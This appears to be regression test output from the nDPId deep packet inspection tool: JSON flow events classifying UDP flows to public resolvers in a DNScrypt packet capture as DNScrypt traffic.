+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380984,"flow_last_seen":946739381021,"flow_idle_time":200000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":825,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":51826,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396111,"flow_last_seen":946739396218,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":832,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":42141,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348756,"flow_last_seen":946739348803,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":43540,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304599,"flow_last_seen":946739304627,"flow_idle_time":200000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":345,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":37950,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380805,"flow_last_seen":946739380844,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":40775,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317496,"flow_last_seen":946739317810,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":43776,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396047,"flow_last_seen":946739396074,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":54204,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318169,"flow_last_seen":946739318205,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":49040,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400522,"flow_last_seen":946739400551,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":832,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":40209,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304363,"flow_last_seen":946739304399,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":59641,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318061,"flow_last_seen":946739318167,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":51935,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":49186,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":43748,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317496,"flow_last_seen":946739317822,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52069,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304789,"flow_last_seen":946739304821,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":39007,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312286,"flow_last_seen":946739312400,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":55896,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318169,"flow_last_seen":946739318200,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":49115,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337048,"flow_last_seen":946739337076,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":45375,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396047,"flow_last_seen":946739396071,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":54305,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317432,"flow_last_seen":946739317461,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":832,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":55046,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304328,"flow_last_seen":946739304362,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":53697,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311153,"flow_last_seen":946739311314,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":38278,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396070,"flow_last_seen":946739396109,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":38242,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739402187,"flow_last_seen":946739402352,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":59587,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739306241,"flow_last_seen":946739306435,"flow_idle_time":200000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1791,"flow_avg_l4_payload_len":895,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":41800,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318061,"flow_last_seen":946739318171,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":54096,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311802,"flow_last_seen":946739312103,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":52911,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348756,"flow_last_seen":946739348800,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":45815,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317432,"flow_last_seen":946739317462,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":832,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":36676,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396047,"flow_last_seen":946739396073,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":48237,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311153,"flow_last_seen":946739311310,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":38349,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":58104,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304328,"flow_last_seen":946739304361,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":37413,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317432,"flow_last_seen":946739317463,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":49008,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305155,"flow_last_seen":946739305189,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":50335,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348805,"flow_last_seen":946739348912,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":41895,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305192,"flow_last_seen":946739305220,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":826,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":53811,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396047,"flow_last_seen":946739396071,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":48300,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400460,"flow_last_seen":946739400520,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":826,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":54920,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337048,"flow_last_seen":946739337077,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":55768,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 